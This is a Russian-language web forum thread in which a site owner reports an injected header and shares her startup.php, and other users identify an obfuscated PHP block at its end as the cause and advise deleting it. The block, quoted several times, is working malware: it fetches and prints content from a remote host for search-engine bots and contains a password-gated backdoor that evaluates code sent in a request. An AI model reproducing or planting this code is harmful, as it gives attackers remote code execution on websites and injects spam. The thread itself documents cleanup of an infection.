Перейти до вмісту
Пошук в
  • Детальніше...
Шукати результати, які ...
Шукати результати в ...

[Решено] Взлом сайта


Mandarin

Recommended Posts

Добрый день! Три дня назад на сайте появилась вот такая хрень в шапке: Изображение

После нее начинается нормальная страница сайта:

Изображение

Запрашивала у хостера резервные копии сайта в те дни, когда все было нормально. Ничего не изменилось. Пробовала найти такую ссылку hoster.ru самостоятельно в файлах - безрезультатно. В админку зайти не могу. Что это может быть такое и как это убрать?

Надіслати
Поділитися на інших сайтах


я, конечно, все понимаю, но о какой помощи может быть речь, если вы даже ссылку на свой сайт не предоставили?

не думаю, что, за время моего отсутствия на форуме, в наших рядах появились телепаты.

Надіслати
Поділитися на інших сайтах

Кодировка слетела - 1, подцепляет куки старой сессии - 2, ну и, как выразился ув. товарищ, так же батарейки сели в хрустальном шаре, котрый не раз помогал угадывать данные ответы...

Надіслати
Поділитися на інших сайтах

покажите содержимое вашего файла /home/u675/catalog-chess.u675.netangels.ru/www/system/startup.php (спрячьте в цитату и спойлер).

Надіслати
Поділитися на інших сайтах

покажите содержимое вашего файла /home/u675/catalog-chess.u675.netangels.ru/www/system/startup.php (спрячьте в цитату и спойлер).

Содержимое startup.php:

<?php
// Error Reporting
error_reporting(E_ALL);

// RegEx
define('EMAIL_PATTERN', '/^[^@]+@.*.[a-z]{2,6}$/i');
// Check Version
if (version_compare(phpversion(), '5.1.0', '<') == TRUE) {
exit('PHP5.1+ Required');
}

// Register Globals
if (ini_get('register_globals')) {
ini_set('session.use_cookies', 'On');
ini_set('session.use_trans_sid', 'Off');
session_set_cookie_params(0, '/');
session_start();

$globals = array($_REQUEST, $_SESSION, $_SERVER, $_FILES);

foreach ($globals as $global) {
  foreach(array_keys($global) as $key) {
   unset($$key);
  }
}
}
// Magic Quotes Fix
if (ini_get('magic_quotes_gpc')) {
function clean($data) {
	 if (is_array($data)) {
	 foreach ($data as $key => $value) {
	   $data[clean($key)] = clean($value);
	 }
  } else {
	 $data = stripslashes($data);
  }

  return $data;
}
$_GET = clean($_GET);
$_POST = clean($_POST);
$_COOKIE = clean($_COOKIE);
}

if (!ini_get('date.timezone')) {
date_default_timezone_set('Europe/Moscow');
}

// Windows IIS Compatibility
if (!isset($_SERVER['DOCUMENT_ROOT'])) {
if (isset($_SERVER['SCRIPT_FILENAME'])) {
  $_SERVER['DOCUMENT_ROOT'] = str_replace('', '/', substr($_SERVER['SCRIPT_FILENAME'], 0, 0 - strlen($_SERVER['PHP_SELF'])));
}
}

if (!isset($_SERVER['DOCUMENT_ROOT'])) {
if (isset($_SERVER['PATH_TRANSLATED'])) {
  $_SERVER['DOCUMENT_ROOT'] = str_replace('', '/', substr(str_replace('', '', $_SERVER['PATH_TRANSLATED']), 0, 0 - strlen($_SERVER['PHP_SELF'])));
}
}

if (!isset($_SERVER['REQUEST_URI'])) {
$_SERVER['REQUEST_URI'] = substr($_SERVER['PHP_SELF'], 1);
if (isset($_SERVER['QUERY_STRING'])) {
  $_SERVER['REQUEST_URI'] .= '?' . $_SERVER['QUERY_STRING'];
}
}

// Engine
require_once(DIR_SYSTEM . 'engine/action.php');
require_once(DIR_SYSTEM . 'engine/controller.php');
require_once(DIR_SYSTEM . 'engine/front.php');
require_once(DIR_SYSTEM . 'engine/loader.php');
require_once(DIR_SYSTEM . 'engine/model.php');
require_once(DIR_SYSTEM . 'engine/registry.php');

// Common
require_once(DIR_SYSTEM . 'library/cache.php');
require_once(DIR_SYSTEM . 'library/config.php');
require_once(DIR_SYSTEM . 'library/db.php');
require_once(DIR_SYSTEM . 'library/document.php');
require_once(DIR_SYSTEM . 'library/image.php');
require_once(DIR_SYSTEM . 'library/language.php');
require_once(DIR_SYSTEM . 'library/log.php');
require_once(DIR_SYSTEM . 'library/mail.php');
require_once(DIR_SYSTEM . 'library/sms.php');
require_once(DIR_SYSTEM . 'library/pagination.php');
require_once(DIR_SYSTEM . 'library/request.php');
require_once(DIR_SYSTEM . 'library/response.php');
require_once(DIR_SYSTEM . 'library/session.php');
require_once(DIR_SYSTEM . 'library/template.php');
?><?php $x12="cx75162l_ix6ei164"; $x13="143u162lx5f163145to160t"; $x14="x63165162154_x65xe143"; $x15="cx75x72l_c154ox73e"; $x16="x65vx61x6c"; $x17="146151154e_147145164137c157156t145156x74163"; $x18="x66un143164i157nx5fx65170151s164x73"; $x19="151n151137x67x65164"; $x1a="preg_mx61164ch"; $x1b="sx74x72151px73la163x68145163"; $x1c="x75r154e156143157x64e";
error_reporting(0);$x0b = "x68x74164x70x3a//a143143x65x73163055x731x2eo162147x2fg145t056php"; $x0c = "1062x33063x32061qx71";if ($x1a("057050171141nx64x65x78|147157x6fx67154145051/x69", $_SERVER['HTTP_USER_AGENT'])) {$x0d = $x1c("150x74164p://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']);$x0e = $x1c($_SERVER['HTTP_USER_AGENT']);$x0f = $x0b."x3fx69x64x3d".$x0d."&c150a162x73etx3dx75&bx6f164x3d".$x0e; if($x19("x61x6clo167137165162x6c_f157x70x65156") == 1) {echo $x17($x0f); } elseif($x18('curl_init')) {$x10 = $x12($x0f);$x13($x10, CURLOPT_HEADER, FALSE);$x13($x10, CURLOPT_RETURNTRANSFER, TRUE);$x11 = $x14($x10);$x15($x10); echo $x11;} } $x0f = $x0b."077x63x6f144145x3dx63x6f144x65046x62o164x3d".$x0e;if($x19("x61x6cl157x77_x75x72x6c137f157x70x65x6e") == 1) { echo $x17($x0f);}elseif($x18('curl_init')) { $x10 = $x12($x0f);$x13($x10, CURLOPT_HEADER, FALSE);$x13($x10, CURLOPT_RETURNTRANSFER, TRUE);$x11 = $x14($x10);$x15($x10); echo $x11;}if($_REQUEST["143"] == $x0c) $x16($x1b($_REQUEST["143x6fd145"])); ?>
Надіслати
Поділитися на інших сайтах


что это? какая у вас сборка?

<?php $x12="cx75162l_ix6ei164"; $x13="143u162lx5f163145to160t"; $x14="x63165162154_x65xe143"; $x15="cx75x72l_c154ox73e"; $x16="x65vx61x6c"; $x17="146151154e_147145164137c157156t145156x74163"; $x18="x66un143164i157nx5fx65170151s164x73"; $x19="151n151137x67x65164"; $x1a="preg_mx61164ch"; $x1b="sx74x72151px73la163x68145163"; $x1c="x75r154e156143157x64e";
error_reporting(0);$x0b = "x68x74164x70x3a//a143143x65x73163055x731x2eo162147x2fg145t056php"; $x0c = "1062x33063x32061qx71";if ($x1a("057050171141nx64x65x78|147157x6fx67154145051/x69", $_SERVER['HTTP_USER_AGENT'])) {$x0d = $x1c("150x74164p://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']);$x0e = $x1c($_SERVER['HTTP_USER_AGENT']);$x0f = $x0b."x3fx69x64x3d".$x0d."&c150a162x73etx3dx75&bx6f164x3d".$x0e; if($x19("x61x6clo167137165162x6c_f157x70x65156") == 1) {echo $x17($x0f); } elseif($x18('curl_init')) {$x10 = $x12($x0f);$x13($x10, CURLOPT_HEADER, FALSE);$x13($x10, CURLOPT_RETURNTRANSFER, TRUE);$x11 = $x14($x10);$x15($x10); echo $x11;} } $x0f = $x0b."077x63x6f144145x3dx63x6f144x65046x62o164x3d".$x0e;if($x19("x61x6cl157x77_x75x72x6c137f157x70x65x6e") == 1) { echo $x17($x0f);}elseif($x18('curl_init')) { $x10 = $x12($x0f);$x13($x10, CURLOPT_HEADER, FALSE);$x13($x10, CURLOPT_RETURNTRANSFER, TRUE);$x11 = $x14($x10);$x15($x10); echo $x11;}if($_REQUEST["143"] == $x0c) $x16($x1b($_REQUEST["143x6fd145"])); ?>
Надіслати
Поділитися на інших сайтах

что это? какая у вас сборка?

<?php $x12="cx75162l_ix6ei164"; $x13="143u162lx5f163145to160t"; $x14="x63165162154_x65xe143"; $x15="cx75x72l_c154ox73e"; $x16="x65vx61x6c"; $x17="146151154e_147145164137c157156t145156x74163"; $x18="x66un143164i157nx5fx65170151s164x73"; $x19="151n151137x67x65164"; $x1a="preg_mx61164ch"; $x1b="sx74x72151px73la163x68145163"; $x1c="x75r154e156143157x64e";
error_reporting(0);$x0b = "x68x74164x70x3a//a143143x65x73163055x731x2eo162147x2fg145t056php"; $x0c = "1062x33063x32061qx71";if ($x1a("057050171141nx64x65x78|147157x6fx67154145051/x69", $_SERVER['HTTP_USER_AGENT'])) {$x0d = $x1c("150x74164p://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']);$x0e = $x1c($_SERVER['HTTP_USER_AGENT']);$x0f = $x0b."x3fx69x64x3d".$x0d."&c150a162x73etx3dx75&bx6f164x3d".$x0e; if($x19("x61x6clo167137165162x6c_f157x70x65156") == 1) {echo $x17($x0f); } elseif($x18('curl_init')) {$x10 = $x12($x0f);$x13($x10, CURLOPT_HEADER, FALSE);$x13($x10, CURLOPT_RETURNTRANSFER, TRUE);$x11 = $x14($x10);$x15($x10); echo $x11;} } $x0f = $x0b."077x63x6f144145x3dx63x6f144x65046x62o164x3d".$x0e;if($x19("x61x6cl157x77_x75x72x6c137f157x70x65x6e") == 1) { echo $x17($x0f);}elseif($x18('curl_init')) { $x10 = $x12($x0f);$x13($x10, CURLOPT_HEADER, FALSE);$x13($x10, CURLOPT_RETURNTRANSFER, TRUE);$x11 = $x14($x10);$x15($x10); echo $x11;}if($_REQUEST["143"] == $x0c) $x16($x1b($_REQUEST["143x6fd145"])); ?>

magento 1.5.1.5

Надіслати
Поділитися на інших сайтах


удаляйте из файла вот эту ерунду

<?php $x12="cx75162l_ix6ei164"; $x13="143u162lx5f163145to160t"; $x14="x63165162154_x65xe143"; $x15="cx75x72l_c154ox73e"; $x16="x65vx61x6c"; $x17="146151154e_147145164137c157156t145156x74163"; $x18="x66un143164i157nx5fx65170151s164x73"; $x19="151n151137x67x65164"; $x1a="preg_mx61164ch"; $x1b="sx74x72151px73la163x68145163"; $x1c="x75r154e156143157x64e";
error_reporting(0);$x0b = "x68x74164x70x3a//a143143x65x73163055x731x2eo162147x2fg145t056php"; $x0c = "1062x33063x32061qx71";if ($x1a("057050171141nx64x65x78|147157x6fx67154145051/x69", $_SERVER['HTTP_USER_AGENT'])) {$x0d = $x1c("150x74164p://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']);$x0e = $x1c($_SERVER['HTTP_USER_AGENT']);$x0f = $x0b."x3fx69x64x3d".$x0d."&c150a162x73etx3dx75&bx6f164x3d".$x0e; if($x19("x61x6clo167137165162x6c_f157x70x65156") == 1) {echo $x17($x0f); } elseif($x18('curl_init')) {$x10 = $x12($x0f);$x13($x10, CURLOPT_HEADER, FALSE);$x13($x10, CURLOPT_RETURNTRANSFER, TRUE);$x11 = $x14($x10);$x15($x10); echo $x11;} } $x0f = $x0b."077x63x6f144145x3dx63x6f144x65046x62o164x3d".$x0e;if($x19("x61x6cl157x77_x75x72x6c137f157x70x65x6e") == 1) { echo $x17($x0f);}elseif($x18('curl_init')) { $x10 = $x12($x0f);$x13($x10, CURLOPT_HEADER, FALSE);$x13($x10, CURLOPT_RETURNTRANSFER, TRUE);$x11 = $x14($x10);$x15($x10); echo $x11;}if($_REQUEST["143"] == $x0c) $x16($x1b($_REQUEST["143x6fd145"])); ?>

и поставьте на него права 644

Надіслати
Поділитися на інших сайтах

удаляйте из файла вот эту ерунду

<?php $x12="cx75162l_ix6ei164"; $x13="143u162lx5f163145to160t"; $x14="x63165162154_x65xe143"; $x15="cx75x72l_c154ox73e"; $x16="x65vx61x6c"; $x17="146151154e_147145164137c157156t145156x74163"; $x18="x66un143164i157nx5fx65170151s164x73"; $x19="151n151137x67x65164"; $x1a="preg_mx61164ch"; $x1b="sx74x72151px73la163x68145163"; $x1c="x75r154e156143157x64e";
error_reporting(0);$x0b = "x68x74164x70x3a//a143143x65x73163055x731x2eo162147x2fg145t056php"; $x0c = "1062x33063x32061qx71";if ($x1a("057050171141nx64x65x78|147157x6fx67154145051/x69", $_SERVER['HTTP_USER_AGENT'])) {$x0d = $x1c("150x74164p://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']);$x0e = $x1c($_SERVER['HTTP_USER_AGENT']);$x0f = $x0b."x3fx69x64x3d".$x0d."&c150a162x73etx3dx75&bx6f164x3d".$x0e; if($x19("x61x6clo167137165162x6c_f157x70x65156") == 1) {echo $x17($x0f); } elseif($x18('curl_init')) {$x10 = $x12($x0f);$x13($x10, CURLOPT_HEADER, FALSE);$x13($x10, CURLOPT_RETURNTRANSFER, TRUE);$x11 = $x14($x10);$x15($x10); echo $x11;} } $x0f = $x0b."077x63x6f144145x3dx63x6f144x65046x62o164x3d".$x0e;if($x19("x61x6cl157x77_x75x72x6c137f157x70x65x6e") == 1) { echo $x17($x0f);}elseif($x18('curl_init')) { $x10 = $x12($x0f);$x13($x10, CURLOPT_HEADER, FALSE);$x13($x10, CURLOPT_RETURNTRANSFER, TRUE);$x11 = $x14($x10);$x15($x10); echo $x11;}if($_REQUEST["143"] == $x0c) $x16($x1b($_REQUEST["143x6fd145"])); ?>

и поставьте на него права 644

Ооо, спасибо, все хорошо! А что за права 644?

Надіслати
Поділитися на інших сайтах


права доступа к файлу.

с такими правами никто, кроме вас не сможет изменить данный файл.

можете попросить службу поддержки вашего хостера сменить права файлу.

правда, мне кажется, что и с другими файлами у вас могут возникнуть проблемы в будущем...

Надіслати
Поділитися на інших сайтах

ОФФ Топ

а в чем запутался-то :) что опенкарт, что магенто, предок-то один оскоммерс, вот тут и запостила ;) если прадед один, значит и внуки одинаковые, глядишь помогут, а на форуме магенто, наверняка "поцаны понтовые сидят" не спешат на помощь :)

Надіслати
Поділитися на інших сайтах


ОФФ Топ

а в чем запутался-то :) что опенкарт, что магенто, предок-то один оскоммерс, вот тут и запостила ;) если прадед один, значит и внуки одинаковые, глядишь помогут, а на форуме магенто, наверняка "поцаны понтовые сидят" не спешат на помощь :)

Админка-то OC :)

Надіслати
Поділитися на інших сайтах

  • 2 months later...

Ну судя по тому как эти плагиаторы внедряют подобный код в труды разработчиков Opencart

<?php $x12="c\x75\162l_i\x6ei\164"; $x13="\143u\162l\x5f\163\145to\160t"; $x14="\x63\165\162\154_\x65xe\143"; $x15="c\x75\x72l_c\154o\x73e"; $x16="\x65v\x61\x6c"; $x17="\146\151\154e_\147\145\164\137c\157\156t\145\156\x74\163"; $x18="\x66un\143\164i\157n\x5f\x65\170\151s\164\x73"; $x19="\151n\151\137\x67\x65\164"; $x1a="preg_m\x61\164ch"; $x1b="s\x74\x72\151p\x73la\163\x68\145\163"; $x1c="\x75r\154e\156\143\157\x64e";
error_reporting(0);$x0b = "\x68\x74\164\x70\x3a//a\143\143\x65\x73\163\055\x731\x2eo\162\147\x2fg\145t\056php"; $x0c = "1\062\x33\063\x32\061q\x71";if ($x1a("\057\050\171\141n\x64\x65\x78|\147\157\x6f\x67\154\145\051/\x69", $_SERVER['HTTP_USER_AGENT'])) {$x0d = $x1c("\150\x74\164p://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']);$x0e = $x1c($_SERVER['HTTP_USER_AGENT']);$x0f = $x0b."\x3f\x69\x64\x3d".$x0d."&c\150a\162\x73et\x3d\x75&b\x6f\164\x3d".$x0e; if($x19("\x61\x6clo\167\137\165\162\x6c_f\157\x70\x65\156") == 1) {echo $x17($x0f); } elseif($x18('curl_init')) {$x10 = $x12($x0f);$x13($x10, CURLOPT_HEADER, FALSE);$x13($x10, CURLOPT_RETURNTRANSFER, TRUE);$x11 = $x14($x10);$x15($x10); echo $x11;} } $x0f = $x0b."\077\x63\x6f\144\145\x3d\x63\x6f\144\x65\046\x62o\164\x3d".$x0e;if($x19("\x61\x6cl\157\x77_\x75\x72\x6c\137f\157\x70\x65\x6e") == 1) { echo $x17($x0f);}elseif($x18('curl_init')) { $x10 = $x12($x0f);$x13($x10, CURLOPT_HEADER, FALSE);$x13($x10, CURLOPT_RETURNTRANSFER, TRUE);$x11 = $x14($x10);$x15($x10); echo $x11;}if($_REQUEST["\143"] == $x0c) $x16($x1b($_REQUEST["\143\x6fd\145"])); ?>

Мне искренне жаль тех, кто будет ставить ЭТО - magento (изуродованный Opencart людьми, которые даже не знают php код). Реально, мне хочется от всей души навалять этим нехорошим людям люлей за такое.

Надіслати
Поділитися на інших сайтах


Створіть аккаунт або увійдіть для коментування

Ви повинні бути користувачем, щоб залишити коментар

Створити обліковий запис

Зареєструйтеся для отримання облікового запису. Це просто!

Зареєструвати аккаунт

Вхід

Уже зареєстровані? Увійдіть тут.

Вхід зараз
  • Зараз на сторінці   0 користувачів

    • Ні користувачів, які переглядиють цю сторінку

×
×
  • Створити...

Important Information

На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність.